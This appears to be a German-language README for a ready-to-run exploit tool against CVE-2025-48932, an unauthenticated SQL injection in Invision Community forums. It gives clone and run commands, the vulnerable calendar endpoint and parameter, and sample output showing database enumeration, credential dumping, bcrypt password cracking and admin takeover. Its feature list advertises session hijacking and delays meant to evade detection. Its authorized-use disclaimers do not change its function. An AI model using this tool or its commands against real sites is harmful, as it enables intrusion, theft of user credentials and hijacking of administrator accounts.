
# CVE-2025-48932 – Nicht authentifizierter SQL-Injection-Exploit für Invision Community ≤ 4.7.20. Vollautomatische Ausnutzung mit Datenbank-Enumeration, Auslesen von Anmeldedaten, Übernahme der Admin-Kontrolle, Session-Hijacking & Multithreading. Keine Abhängigkeiten erforderlich. Sicherheitsforschungs-Tool von Sudeepa Wanigarathna
CVE-2025-48932 ist eine kritische, nicht authentifizierte Blind-SQL-Injection-Schwachstelle, die in Invision Community Versionen ≤ 4.7.20 entdeckt wurde. Dieser Exploit ermöglicht entfernten Angreifern:
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# No dependencies to install! Just run it.
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only
# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v
# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# Save results to custom file
python3 exploit.py -u https://example.com -o results.json
# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10
# Dump all available data
python3 exploit.py -u https://example.com --dump-all
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json
# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!
# Download popular wordlist
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location (vom Benutzer bereitgestellte Eingabe)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
Dieses Tool dient ausschließlich zu BILDUNGSZWECKEN und für AUTORISIERTE TESTS.
Durch die Nutzung dieses Tools stimmen Sie Folgendem zu:
Unbefugter Zugriff auf Computersysteme ist illegal und unethisch.
invision_exploit_report_[timestamp].json
├── target # Target URL
├── timestamp # Exploit timestamp
├── vulnerable # Vulnerability status
├── database # Database information
├── databases # List of databases
├── tables # List of tables
├── credentials # Extracted credentials
├── admin_info # Admin user information
└── summary # Exploitation summary
Problem: Verbindungszeitüberschreitung
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60
Problem: SSL-Zertifikatsfehler
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl
Problem: Ratenbegrenzung erkannt
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2
Problem: Kein verwundbarer Parameter gefunden
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists
Wir freuen uns über Beiträge! Siehe unsere Beitragsrichtlinien.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Sicherheitsforscher & Bug-Bounty-Jäger
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Wenn Ihnen dieses Projekt geholfen hat oder Sie es interessant fanden:
Cybersicherheitsforscher | Softwareentwickler | CTF-Engineer
Dieses Projekt wird für Sicherheitsforschung, defensive Analysen und autorisierte Penetrationstests bereitgestellt. Die Nutzer sind dafür verantwortlich, alle geltenden Gesetze einzuhalten und vor der Verwendung die entsprechende Genehmigung einzuholen.
| Funktion | Beschreibung | Status |
|---|
| 🚀 Null Abhängigkeiten | Reine Python-Standardbibliothek – kein pip install erforderlich | ✅ |
| ⚡ Multithreaded | Blitzschnelle Datenextraktion mit konfigurierbaren Threads | ✅ |
| 🤖 Vollautomatisch | Vollständige Exploit-Kette von der Erkennung bis zur Berichterstellung | ✅ |
| 👑 Admin-Übernahme | Session-Hijacking & Privilegieneskalation | ✅ |
| 🔑 Credential-Dumping | Benutzer, Passwort-Hashes und E-Mails extrahieren | ✅ |
| 🔓 Passwort-Cracking | Integriertes Hash-Cracking mit Wordlist-Unterstützung | ✅ |
| 📋 JSON-Berichte | Strukturierte Ausgabe für Analyse & Dokumentation | ✅ |
| 🔌 Proxy-Unterstützung | Integration von Burp Suite & benutzerdefinierten Proxys | ✅ |
| 🎨 Farbige Ausgabe | Ansprechende Terminalausgabe mit Fortschrittsanzeigen | ✅ |
| 🛡️ Ratenbegrenzung | Integrierte Verzögerungen zur Vermeidung der Erkennung | ✅ |
| Argument | Beschreibung | Beispiel |
|---|
-u, --url | Ziel-URL (erforderlich) | -u https://example.com |
-p, --proxy | Proxy-URL | -p http://127.0.0.1:8080 |
-t, --threads | Anzahl der Threads (Standard: 5) | -t 10 |
-o, --output | Ausgabedatei für Ergebnisse | -o results.json |
-v, --verbose | Ausführliche Ausgabe aktivieren | -v |
--check-only | Nur Schwachstelle prüfen | --check-only |
--dump-all | Alle verfügbaren Daten auslesen | --dump-all |
--wordlist | Wordlist-Datei zum Knacken | --wordlist rockyou.txt |